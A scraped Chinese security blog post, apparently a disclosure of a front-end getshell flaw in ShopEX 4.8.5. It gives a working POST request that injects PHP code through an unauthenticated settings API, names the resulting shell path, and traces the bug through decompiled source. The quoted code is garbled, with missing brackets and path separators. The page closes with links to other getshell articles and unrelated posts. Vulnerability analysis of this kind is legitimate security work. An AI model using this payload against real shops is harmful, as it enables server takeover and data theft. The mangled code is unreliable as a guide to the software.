ShopEX 4.8.5.81822 前台Getshell

作者:unhonker   发布:2014-06-23 00:12   分类:漏洞公布   被撸:8,179次   抢沙发  
 

利用方式:
Post提交

Post Data

conf_key=<!--?php phpinfo();?-->.yyyyy&amp;conf_val=test

http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&amp;api_version=5.0

Shell地址:

http://127.0.0.1/shopex-single-4.8.5.81822/home/cache/cachedata.stat.php

提交后:

漏洞成因(解密后的代码错乱,只看关键的,无关代码已经略去)

http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0

api.php中10-11行

        require(CORE_DIR.'/api/shop_api.php');

        $system = new shop_api();

core/api/shop_api.php中

<?php

require_once( CORE_DIR."/kernel.php" );

require_once( CORE_DIR."/func_ext.php" );

class shop_api extends kernel

{

/**省略**/

        public function shop_api( )

    {

                $apiAct = $_REQUEST['act'];

        $APIs = include( CORE_DIR."/api/include/api_link.php" );

        $apiVersion = $_REQUEST['api_version' ) && $APIs[$apiAct][$apiVersion];

        $api = $APIs[$apiAct][$apiVersion];

                if(!$APIs[$apiAct][$apiversion]['n_varify' && !$this->verfy($_POST)){

            $this->error_handle('veriy fail');//n_varify=1,不需要经过verfy()函数处理

                }

        include( CORE_DIR."/api/shop_api_object.php" );

                include( CORE_DIR."/".dirname( $ctl )."/".$apiVersion."/".basename( $ctl ).".php" );

        $ctl = basename( $ctl );

        $act = $api['act'];

        if ( !class_exists( $ctl ) || !( $ctlObj = new $ctl( ) ) || !method_exists( $ctlObj, $act ) )

        {

            $this->error_handle( "service error", "can not service" );

        }

        /***下面应该是调用set_shopex_conf函数***/

        $ctlObj->$act($_POST);

        /**省略**/

    }

/**省略**/

?>

访问[url]http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0[/url]即调用coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

conf_key=<?php phpinfo();?>.yyyyy&conf_val=test

访问[url]http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0[/url]即调用coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

core/api/include/api_link.php中

$APIs['set_shopex_conf']=Array ( [5.0 => Array ( [ctl => api/site/api_5_0_site [act => set_shopex_conf [n_varify => 1 ) ); n_varify=1,不需要经过verfy()函数处理

coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

public function set_shopex_conf( $data )

    {

        error_log( var_export( $data, 1 ), 3, __FILE__.( ".log" ) );//写入了coreapisite5.0api_5_0_site.php.log

        $this->system->setConf( $data['conf_key'], $data['conf_val' );//即setConf('<?php phpinfo();?>.yyyyy','test');

        $this->api_response( "true", false, "succ" );

    }

corekernel.php中

    public function setConf( $key, $data, $immediately = false )

    {

        return $this->__setting->set( $key, $data, $immediately );

        /***省略***/

    }

coreinclude_v5setmgr.php中

public function set( $key, $value, $immediately = false )//即set('<?php phpinfo();?>.yyyyy','test');

    {

        if ( !( $pos = strpos( $key, "." ) ) )

        {

            return;

        }

        $sub = substr( $key, $pos + 1 );

        if ( "*" == $sub )

        {

            $this->_pool[substr( $key, 0, $pos = $value;

        }

        else

        {

            $this->_pool[substr( $key, 0, $pos )][$sub = $value;//$this->_pool['<?php phpinfo();?>']['yyyyy']='test';

        }

        if ( $immediately )

        {

            return $this->_save( );

        }

        register_shutdown_function( array( $this, "_save" ) );//脚本执行完成时将调用_save函数[url]http://www.php.net/manual/zh/fun[/url] ... utdown-function.php

        return true;

    }

coreinclude_v5setmgr.php中

public function _save( )

    {

        $db =& $this->system->database( );

        $vary = array( );

        foreach ( $this->_pool as $domain => $values )

        {

            $this->_bool_data_varify( $domain.".".key( $values ), $values );

            $rs = $db->quote( $domain )( "select * from sdb_settings where s_name=".$db->quote( $domain ) );

            $row = $db->getRows( $rs );

            $data = unserialize( $row[0]['s_data' );

            $values = $data ? array_merge( $data, $values ) : $values;

            $send = array( "s_name" => $domain, "s_data" => $values, "s_time" => time( ) );

            $sql = $db->getUpdateSql( $rs, $send, true );

            if ( $sql )

            {

                $db->exec( $sql );

            }

            $vary["SETTING_".$domain = 1;

        }

        $this->system->cache->setModified( array_keys( $vary ) );//调用此函数将$this->_pool数组的键名写入到home/cache/cachedata.stat.php中

        return true;

    }

pluginsfunctionscache_secache.php中

    function cache_secache(){

        $this->workat(HOME_DIR.'/cache/cachedata');

        $statfile = HOME_DIR.'/cache/cachedata.stat.php';

        if(file_exists($statfile)){

            $this->_stat_rs = fopen($statfile,'rb+');

            $contents = '';

            while (!feof($this->_stat_rs)) {

                $contents .= fread($this->_stat_rs, 4096);

            }

            $this->_vary_list = unserialize($contents);

        }else{

            $this->_stat_rs = fopen($statfile,'wb+');

            $this->_vary_list = array();

        }

    }

function setModified($key){

        $now = time();

        if(is_array($key)){

            foreach($key as $k){

                $this->_vary_list[strtoupper($k = $now;

            }

        }else{

            $this->_vary_list[strtoupper($key = $now;

        }

        fseek($this->_stat_rs,0);

        ftruncate($this->_stat_rs,0);

        return fputs($this->_stat_rs,serialize($this->_vary_list));//最终写入到 home/cache/cachedata.stat.php

    }

home/cache/cachedata.stat.php开头没有一共写到两个文件
/core/api/site/5.0/api_5_0_site.php.log 此处apache配置不当的话也可能会当作php解析
/home/cache/cachedata.stat.php

ShopEX 4.8.5.81822 前台Getshell的更多相关文章

  1. phpcms v9 前台getshell脚本

    phpcms v9 前台getshell脚本 用法:python phpcmsv9getshell.py http://baidu.com # -*- coding:utf-8 -*- ''' --- ...

  2. PHP7CMS 无条件前台GETSHELL

    PHP7CMS 无条件前台GETSHELL Version:2018-10-09 //最新版中以修复此漏洞 这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的.   01 0 ...

  3. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  4. PHPCMS9.6.0最新版SQL注入和前台GETSHELL漏洞分析 (实验新课)

    PHPCMS9.6.0最新版中,由于/modules/attachment/attachments.php的过滤函数的缺陷导致了可以绕过它的过滤机制形成SQL注入漏洞,可导致数据库中数据泄漏. 而且在 ...

  5. 利用Thinkphp 5缓存漏洞实现前台Getshell

    0×00 背景 网站为了实现加速访问,会将用户访问过的页面存入缓存来减小数据库查询的开销.而Thinkphp5框架的缓存漏洞使得在缓存中注入代码成为可能.(漏洞详情见参考资料) 本文将会详细讲解: 1 ...

  6. phpcms9 从注入点入手和 从前台getshell

    弄了3天了  这个点 总结一下这三天的坑吧 0X01 注入点入手 /index.php?m=wap&c=index&a=init&siteid=1 获取cookie 传给 us ...

  7. ThinkSNS2.5前台getshell+后台任意文件删除

    12年爆出的一个洞 前几天比赛的一个cms  于是跟出题人表哥要过来审计了看看 漏洞文件再根目录thumb.php中 <?php /* * 自动缩略图 参数 url|w|h|type=" ...

  8. [代码审计]某开源商城前台getshell

    0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来. 下面就分享一下自己审这套系统的整个过程. 0x01 系统简介 略   0x02 审计入口 看到inc\functi ...

  9. 代码审计之seacms v6.54 前台Getshell 复现分析

    1.环境: php5.5.38+apache+seacms v6.54 上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加: $order = ( ...

随机推荐

  1. Gmail邮箱添加域名解析

    主机记录  MX   服务器地址 优先级@  MX   ASPMX.L.GOOGLE.COM. 10@  MX   ALT1.ASPMX.L.GOOGLE.COM. 20@  MX   ALT2.AS ...

  2. 基于 Qt的聊天工具

    主要参考:http://blog.csdn.net/zouxy09/article/details/9140881

  3. Neutron Metering as a Service

    1, /etc/neutron/neutron.conf   service_plugins = router,metering    notification_driver=neutron.open ...

  4. Core Java Volume I — 3.10. Arrays

    3.10. ArraysAn array is a data structure that stores a collection of values of the same type. You ac ...

  5. springmvc学习笔记--REST API的异常处理

    前言: 最近使用springmvc写了不少rest api, 觉得真是一个好框架. 之前描述的几篇关于rest api的文章, 其实还是不够完善. 比如当遇到参数缺失, 类型不匹配的情况时, 直接抛出 ...

  6. 111. Minimum Depth of Binary Tree

    Given a binary tree, find its minimum depth. The minimum depth is the number of nodes along the shor ...

  7. LAMT基于mod_jk方式的负载均衡集群

    一.系统环境 1.apache服务器 系统环境:CentOS release 6.5 (Final) ip地址:192.168.1.203 2.tomcat1服务器 系统环境:CentOS relea ...

  8. 第4章 yum在线安装

    1.概述 <1>rpm包的安装过程中,rpm包的依赖性太强 如果所有rpm包都是手工安装,则rpm包使用难度较大, 因而出现了yum在线安装的方法 <2>好处:将所有软件包放到 ...

  9. scala言语基础学习

    scala变长参数: 递归累加: scala异常的使用: array和arraybuffer的使用 定长array: arraybuff:

  10. IOS中调用系统的电话、短信、邮件、浏览功能

    iOS开发系列--通讯录.蓝牙.内购.GameCenter.iCloud.Passbook系统服务开发汇总 2015-01-13 09:16 by KenshinCui, 26990 阅读, 35 评 ...